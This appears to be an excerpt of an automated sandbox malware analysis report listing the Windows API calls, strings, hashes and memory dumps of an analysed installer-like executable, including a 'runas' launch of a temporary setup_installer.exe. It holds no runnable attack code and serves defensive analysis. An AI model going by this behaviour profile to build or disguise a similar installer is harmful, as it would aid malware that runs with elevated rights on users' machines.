                                        • Opcode ID: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                                        • Instruction ID: 0e1b57c135d9ed337dcee0f1630d7a3ffd6699826ab823f4ff8c6da5104765b0
                                        • Opcode Fuzzy Hash: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                                        • Instruction Fuzzy Hash: DCD09E71254201AFEF0D8F20DF16F2E7AA2EB94B04F11952CB682940E1DAB15C15AB19
                                        APIs
                                        • GetFileAttributesW.KERNELBASE(?,?,00405C12,?,?,00000000,00405DE8,?,?,?,?), ref: 00406012
                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 00406026
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1684714458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684744175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684822761.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.jbxd
                                        Similarity
                                        • API ID: AttributesFile
                                        • String ID:
                                        • API String ID: 3188754299-0
                                        • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                        • Instruction ID: 2aab62ad23f8cb6709c95f945eae6201b0fb2c2ffcd307ea01f0c72ec21377a4
                                        • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                        • Instruction Fuzzy Hash: 9AD0C972504131ABC2502728EE0889ABF55EF682717014A35F9A5A22B0CB314C628A98
                                        APIs
                                        • CreateDirectoryW.KERNELBASE(?,00000000,004035CB,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 00405AF6
                                        • GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 00405B04
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1684714458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684744175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684822761.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.jbxd
                                        Similarity
                                        • API ID: CreateDirectoryErrorLast
                                        • String ID:
                                        • API String ID: 1375471231-0
                                        • Opcode ID: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                                        • Instruction ID: 7b2d9cd717f5aff8da3a1f7dd460dbe6a594badd890d3698b32dee5738bc8dc1
                                        • Opcode Fuzzy Hash: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                                        • Instruction Fuzzy Hash: 50C04C30204601AEDA509B30DF08B177AA4AF50741F1158396246E40A0DA78A455D92D
                                        APIs
                                        • WriteFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,0040D8AD,0040CEF0,00403511,0040CEF0,0040D8AD,00414EF0,00004000,?,00000000,0040333B,00000004), ref: 004060F8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1684714458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684744175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684822761.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.jbxd
                                        Similarity
                                        • API ID: FileWrite
                                        • String ID:
                                        • API String ID: 3934441357-0
                                        • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                        • Instruction ID: 6979515bda9704ff85578e0c0429e47610ce6c1510064802d49ef9c1332cb9e6
                                        • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                        • Instruction Fuzzy Hash: E3E08C3221022AABEF109E618C04AEB7B6CEB01360F014832FE16E7040D271E9308BE8
                                        APIs
                                        • ReadFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,00414EF0,0040CEF0,0040358D,0040A230,0040A230,00403491,00414EF0,00004000,?,00000000,0040333B), ref: 004060C9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1684714458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684744175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684822761.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.jbxd
                                        Similarity
                                        • API ID: FileRead
                                        • String ID:
                                        • API String ID: 2738559852-0
                                        • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                        • Instruction ID: 6a9dac85b633d085c252a5e98b17eff4fa9db91ceb9277f9f5c2807d74357857
                                        • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                        • Instruction Fuzzy Hash: DCE0E63215026AABDF109E559C04AEB775CEF05751F014836F916E6190D631E93197A4
                                        APIs
                                        • ShellExecuteExW.SHELL32(?), ref: 00405B77
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1684714458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684744175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684822761.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.jbxd
                                        Similarity
                                        • API ID: ExecuteShell
                                        • String ID:
                                        • API String ID: 587946157-0
                                        • Opcode ID: 34af207f7f04f37b2a6a243a8c8041682423b78b35e6f682d2e1a111f695392f
                                        • Instruction ID: 155326c85e208380d9db810c36285a9e1b4200be200639c8195ffcf147e959ee
                                        • Opcode Fuzzy Hash: 34af207f7f04f37b2a6a243a8c8041682423b78b35e6f682d2e1a111f695392f
                                        • Instruction Fuzzy Hash: BEC092B2000200EFE301CF80CB09F067BE8AF54306F028068E185DA060C7788840CB29
                                        APIs
                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040328E,?), ref: 0040359E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1684714458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684744175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684822761.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.jbxd
                                        Similarity
                                        • API ID: FilePointer
                                        • String ID:
                                        • API String ID: 973152223-0
                                        • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                        • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                                        • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                        • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                                        APIs
                                        • GetDlgItem.USER32(?,00000403), ref: 00405741
                                        • GetDlgItem.USER32(?,000003EE), ref: 00405750
                                        • GetClientRect.USER32(?,?), ref: 0040578D
                                        • GetSystemMetrics.USER32(00000002), ref: 00405794
                                        • SendMessageW.USER32(?,00001061,00000000,?), ref: 004057B5
                                        • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057C6
                                        • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057D9
                                        • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057E7
                                        • SendMessageW.USER32(?,00001024,00000000,?), ref: 004057FA
                                        • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040581C
                                        • ShowWindow.USER32(?,00000008), ref: 00405830
                                        • GetDlgItem.USER32(?,000003EC), ref: 00405851
                                        • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405861
                                        • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040587A
                                        • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405886
                                        • GetDlgItem.USER32(?,000003F8), ref: 0040575F
                                          • Part of subcall function 004044C7: SendMessageW.USER32(00000028,?,00000001,004042F2), ref: 004044D5
                                        • GetDlgItem.USER32(?,000003EC), ref: 004058A3
                                        • CreateThread.KERNEL32(00000000,00000000,Function_00005677,00000000), ref: 004058B1
                                        • CloseHandle.KERNEL32(00000000), ref: 004058B8
                                        • ShowWindow.USER32(00000000), ref: 004058DC
                                        • ShowWindow.USER32(?,00000008), ref: 004058E1
                                        • ShowWindow.USER32(00000008), ref: 0040592B
                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040595F
                                        • CreatePopupMenu.USER32 ref: 00405970
                                        • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405984
                                        • GetWindowRect.USER32(?,?), ref: 004059A4
                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059BD
                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 004059F5
                                        • OpenClipboard.USER32(00000000), ref: 00405A05
                                        • EmptyClipboard.USER32 ref: 00405A0B
                                        • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A17
                                        • GlobalLock.KERNEL32(00000000), ref: 00405A21
                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A35
                                        • GlobalUnlock.KERNEL32(00000000), ref: 00405A55
                                        • SetClipboardData.USER32(0000000D,00000000), ref: 00405A60
                                        • CloseClipboard.USER32 ref: 00405A66
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1684714458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684744175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684822761.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.jbxd
                                        Similarity
                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                        • String ID: H7B${
                                        • API String ID: 590372296-2256286769
                                        • Opcode ID: de83834612293bf752b8c6c6de4c5caa3b4facca9786645fdbb76cb5e3bc5ba2
                                        • Instruction ID: babe9631ed489b332455c35fc9929fd6d80e8fe82f7b5f1866f1dd344d2d825a
                                        • Opcode Fuzzy Hash: de83834612293bf752b8c6c6de4c5caa3b4facca9786645fdbb76cb5e3bc5ba2
                                        • Instruction Fuzzy Hash: C9B159B1900608FFDF11AFA0DD85AAE7B79FB48354F00847AFA41A61A0CB754E51DF68
                                        APIs
                                        • GetDlgItem.USER32(?,000003FB), ref: 004049D2
                                        • SetWindowTextW.USER32(00000000,?), ref: 004049FC
                                        • SHBrowseForFolderW.SHELL32(?), ref: 00404AAD
                                        • CoTaskMemFree.OLE32(00000000), ref: 00404AB8
                                        • lstrcmpiW.KERNEL32(runas C:\Users\user\AppData\Local\Temp\setup_installer.exe,00423748,00000000,?,?), ref: 00404AEA
                                        • lstrcatW.KERNEL32(?,runas C:\Users\user\AppData\Local\Temp\setup_installer.exe), ref: 00404AF6
                                        • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B08
                                          • Part of subcall function 00405B86: GetDlgItemTextW.USER32(?,?,00000400,00404B3F), ref: 00405B99
                                          • Part of subcall function 004067EB: CharNextW.USER32(?,*?|<>/":,00000000,00000000,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe",004035B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 0040684E
                                          • Part of subcall function 004067EB: CharNextW.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 0040685D
                                          • Part of subcall function 004067EB: CharNextW.USER32(?,00000000,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe",004035B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 00406862
                                          • Part of subcall function 004067EB: CharPrevW.USER32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe",004035B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 00406875
                                        • GetDiskFreeSpaceW.KERNEL32(00421718,?,?,0000040F,?,00421718,00421718,?,00000001,00421718,?,?,000003FB,?), ref: 00404BCB
                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404BE6
                                          • Part of subcall function 00404D3F: lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE0
                                          • Part of subcall function 00404D3F: wsprintfW.USER32 ref: 00404DE9
                                          • Part of subcall function 00404D3F: SetDlgItemTextW.USER32(?,00423748), ref: 00404DFC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1684714458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684744175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684822761.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.jbxd
                                        Similarity
                                        • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                        • String ID: A$C:\Users\user\AppData\Local\Temp$H7B$runas C:\Users\user\AppData\Local\Temp\setup_installer.exe
                                        • API String ID: 2624150263-3735337332
                                        • Opcode ID: dd814ec643b45a90e93cf69e5cb033f89cff98d2f4c91cecb2b3846f87e86dba
                                        • Instruction ID: 8299be71a3cc8d15b5ba292867d4bcc1bae11f059afa92557538f40593a335a7
                                        • Opcode Fuzzy Hash: dd814ec643b45a90e93cf69e5cb033f89cff98d2f4c91cecb2b3846f87e86dba
                                        • Instruction Fuzzy Hash: 8EA193B1900209ABDB11AFA5DD45AAFB7B8EF84314F11803BF601B62D1D77C9941CB6D
                                        APIs
                                        • DeleteFileW.KERNEL32(?,?,74DF3420,74DF2EE0,00000000), ref: 00405C77
                                        • lstrcatW.KERNEL32(00425750,\*.*), ref: 00405CBF
                                        • lstrcatW.KERNEL32(?,0040A014), ref: 00405CE2
                                        • lstrlenW.KERNEL32(?,?,0040A014,?,00425750,?,?,74DF3420,74DF2EE0,00000000), ref: 00405CE8
                                        • FindFirstFileW.KERNEL32(00425750,?,?,?,0040A014,?,00425750,?,?,74DF3420,74DF2EE0,00000000), ref: 00405CF8
                                        • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D98
                                        • FindClose.KERNEL32(00000000), ref: 00405DA7
                                        Strings
                                        • "C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe", xrefs: 00405C4E
                                        • PWB, xrefs: 00405CA7
                                        • \*.*, xrefs: 00405CB9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1684714458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684744175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684822761.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.jbxd
                                        Similarity
                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                        • String ID: "C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe"$PWB$\*.*
                                        • API String ID: 2035342205-2540774632
                                        • Opcode ID: 3a6aa6978e1e6dac12dbcf27a865e65220d343208ac152093f5b12310eb1b7a8
                                        • Instruction ID: 388f2befc2087cc18a81576ce5b748581f321be521e7d033b0a51c5b8adb9818
                                        • Opcode Fuzzy Hash: 3a6aa6978e1e6dac12dbcf27a865e65220d343208ac152093f5b12310eb1b7a8
                                        • Instruction Fuzzy Hash: C141CF30800A14BADB21AB65DC8DABF7678EF41718F50813BF841B51D1D77C4A82DEAE
                                        APIs
                                        • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402221
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp, xrefs: 00402261
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1684714458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684744175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684822761.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.jbxd
                                        Similarity
                                        • API ID: CreateInstance
                                        • String ID: C:\Users\user\AppData\Local\Temp
                                        • API String ID: 542301482-47812868
                                        • Opcode ID: 5af9135ba59482d15b8eba766ae0685eae6086f6b6ffaba7cd38e99d6e7f92d4
                                        • Instruction ID: 3a0b8fa6945436ea0e4cb0e043321d643ed21fd69d70badd8d93d2b131f18866
                                        • Opcode Fuzzy Hash: 5af9135ba59482d15b8eba766ae0685eae6086f6b6ffaba7cd38e99d6e7f92d4
                                        • Instruction Fuzzy Hash: C9412775A00209AFCF00DFE4C989A9E7BB6FF48304B20457AF915EB2D1DB799981CB54
                                        APIs
                                        • FindFirstFileW.KERNEL32(74DF3420,00426798,00425F50,00405F62,00425F50,00425F50,00000000,00425F50,00425F50,74DF3420,?,74DF2EE0,00405C6E,?,74DF3420,74DF2EE0), ref: 004068A5
                                        • FindClose.KERNEL32(00000000), ref: 004068B1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1684714458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684744175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684822761.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.jbxd
                                        Similarity
                                        • API ID: Find$CloseFileFirst
                                        • String ID:
                                        • API String ID: 2295610775-0
                                        • Opcode ID: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
                                        • Instruction ID: 17741e7b15207d6702ed9fc8e7bdeca0d2b34881c01bff23dce0e4374d0b2feb
                                        • Opcode Fuzzy Hash: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
                                        • Instruction Fuzzy Hash: 1FD0C7315051205BD24116346D4C84765985F55331311CA36B4A5F11A0C7348C3246AC
                                        APIs
                                        • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402911
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1684714458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684744175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684822761.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.jbxd
                                        Similarity
                                        • API ID: FileFindFirst
                                        • String ID:
                                        • API String ID: 1974802433-0
                                        • Opcode ID: 73ea5844b7f20d7c5e79e975fdc737a0938daa2fd1a0c7191d7c211d4df56dda
                                        • Instruction ID: e1d09971df8357d0b6d26b0e23bbdd0a86073f761c05595cd8bb911c59de634c
                                        • Opcode Fuzzy Hash: 73ea5844b7f20d7c5e79e975fdc737a0938daa2fd1a0c7191d7c211d4df56dda
                                        • Instruction Fuzzy Hash: C9F08C71A00104AFC700DFA4ED499AEB378EF10314F70857BE916F21E0D7B89E119B2A
                                        APIs
                                        • GetDlgItem.USER32(?,000003F9), ref: 00404F16
                                        • GetDlgItem.USER32(?,00000408), ref: 00404F23
                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 00404F6F
                                        • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404F86
                                        • SetWindowLongW.USER32(?,000000FC,00405518), ref: 00404FA0
                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FB4
                                        • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404FC8
                                        • SendMessageW.USER32(?,00001109,00000002), ref: 00404FDD
                                        • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FE9
                                        • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404FFB
                                        • DeleteObject.GDI32(00000110), ref: 00405000
                                        • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0040502B
                                        • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405037
                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050D2
